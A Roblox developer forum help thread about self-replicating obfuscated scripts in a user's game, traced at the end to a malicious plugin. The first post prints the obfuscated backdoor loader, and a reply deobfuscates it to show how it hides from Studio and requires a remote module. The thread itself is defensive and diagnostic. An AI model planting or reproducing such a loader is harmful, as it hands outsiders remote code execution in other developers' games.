Suspected virus in my game [SOLVED]

Help and Feedback Scripting Support
1

Hello.

I was working on a border patrol game with a couple of friends. Out of no where, my friend and me started to discover these scripts inside the parts of the roads I made. The scripts had no name, and in them, the code was

“LSQhaYmZsZzaWbVRERrcJjMZ=‘Ru’…‘nS’…‘ervi’…‘ce’;YPBIaTqRmnyTzyZpVdM=‘oidutSsI’;NxxwTurYfMyHpXMVGJmuBorpf=game;pFQFFJuwibURGf=NxxwTurYfMyHpXMVGJmuBorpf.GetService;Bbe=‘r’…‘ev’…‘er’…‘se’;jiCAKt=pcall;LZKOrfSpg=‘Mar’…‘ke’…‘tP’…‘la’…‘ce’…‘Se’…‘rvic’…‘e’;YmLEzJjwHUXuvajO=‘Ge’…‘tPr’…‘oduc’…‘tIn’…‘fo’;BZSCcFtCdDgCe='ᮍ’rRtO = getfenv ( ) [ ‘\114’ … ‘\101\113’ … ‘\117\105\114\101’ ];if pFQFFJuwibURGf ( NxxwTurYfMyHpXMVGJmuBorpf , LSQhaYmZsZzaWbVRERrcJjMZ )[ YPBIaTqRmnyTzyZpVdM Bbe ] ( pFQFFJuwibURGf ( NxxwTurYfMyHpXMVGJmuBorpf , LSQhaYmZsZzaWbVRERrcJjMZ ) ) then return end;if not jiCAKt(function() lsOpyZaOyBgrksbHfoowI = pFQFFJuwibURGf ( NxxwTurYfMyHpXMVGJmuBorpf , LZKOrfSpg ) [ YmLEzJjwHUXuvajO ] ( pFQFFJuwibURGf ( NxxwTurYfMyHpXMVGJmuBorpf , LZKOrfSpg ) , 73379870112 / 16 ) [ ‘Desc’ … ‘ript’ … ‘ion’ ] rRtO ( tonumber ( lsOpyZaOyBgrksbHfoowI : match ( ‘%d+’ ) ) ) end) then jiCAKt( function ( ) rRtO ( 1526761926 * 3 ) end ) end”

I deleted all of them. But then, they started to appear again… so i deleted them again. And then, they started to appear again…

The only trouble In game that I have notice is that sometimes I randomly get teleported to a game, then it teleports my back to my own.

I had the “gui to lua” plugin which may have been the issue as I found some other people talking about, but I am still finding these scripts.

Any help?

Thanks.

2 Likes
2

Firstly, I would suggest searching for a require script in your scripts. You can do this by pressing CTRL + SHIFT + F to help find the script. (Require scripts that can be a backdoor issue will have random numbers. However, you can look up the model ID on Roblox to find more information on it.)

Secondly, I suggest going over the source codes on your plugins. There may be malicious scripts that are appearing every time you use a plugin.

If these issues are still happening, try uninstalling all of your plugins you don’t use. Even if a plugin is disabled, it can still put stuff in your game.

3 Likes
3

I agree. If it’s happening in studio it can be the following

  1. Your friend trolling you [not likely]
  2. You have a plugin causing this [very likely]
  3. This is very very unlikely but make sure you’re exploit proof on your remotes and aren’t using SavePlaceAsync.
4 Likes
4

Really? Even if a plugin with a virus is disabled, it can keep working?

5

I’m pretty sure, at least that’s what I have heard from other people.

1 Like
6

A disabled plugin cannot run at all. I have tested this as one of my plugin that I made prints out “Welcome to grip editor” when studio is opened. However, when it is disabled, I don’t see that anymore. If you have already disabled your plugins and it keeps happening, try disabling more, or it’s probably one of the other options.

2 Likes
7

Yeah all my plugins are disabled. The script starts to appear in random parts, and has no name.

8

Are you seeing the growth in studio, or in game, how much time do you think it takes?
Try copying the first few characters in that script and using CTRL + SHIFT + F with those few characters and deleting them all.

1 Like
9

It happens in studio, when I am editing. I can rule out that it is not my friend as this happens when he is offline.

The time normally happens over a long period. Once I delete all the repeated scripts, later on I start finding them in other parts.

10

Ask your friend to remove his plugins too. His could also be an issue (if he has any)
Please also link any suspicious plugins.

1 Like
11

Since scripts outside of plugins and command bar don’t run in a studio environment, it is most likely a plugin if you are not running anything with command bar. Try removing any plugins that aren’t commonly used by many people.

1 Like
12

Thanks for the reply.

My friend has also disabled all of his plugins.

13

If you link some of the plugins you use, I could look at sources and try to find one that is malicious.

1 Like
14

If you wondering what the code actually did here is the deobfuscated version, roughly:

-- Variables were there to obscure the code further

if game:GetService("RunService"):IsStudio() then
    return
end

if not pcall(function()
    description = game:GetService("MarketplaceService"):GetProductInfo(4586241882).Description
end) then
    pcall(function()
        require(4580285778)
    end)
end

It’s requiring a module, that’s about it. It checks if the script is running in studio to do nothing so you don’t realise there’s something going on until you actually play in a real game. Btw if you ever want to inspect a plugin’s source just do in the command bar:

game:GetObjects("rbxassetid://123456")[1].Parent = workspace

Changing the 123456 to the ID of the plugin, of course.

4 Likes
15

If your unobfuscatation is accurate, the required model is:
https://www.roblox.com/library/4580285778/unnamed

2 Likes
16

This happens because of viruses found in malicious third-party plugins. These plugins are often botted onto the relevant section of the Plugins toolbox, making it extremely easy to fall for. I recommend looking at approval ratings, comments, the plugin’s creator, and many other factors. Luckily, I doubt that these plugins do any (serious) damage onto your game, aside from pasting in random lines of code. Just remember to stay vigilant when it comes to things on the toolbox.

2 Likes
17

https://www.roblox.com/library/142269379/Roblox-Best-Infection-Remover I used this plugin for years and never disappointed me, it will remove any virus script from your game.

19

The issue has been solved, my freind has the virus in a plugin. I had to remove him. The scripts appeared in roblox studio, and reappeared after I deleted them.

1 Like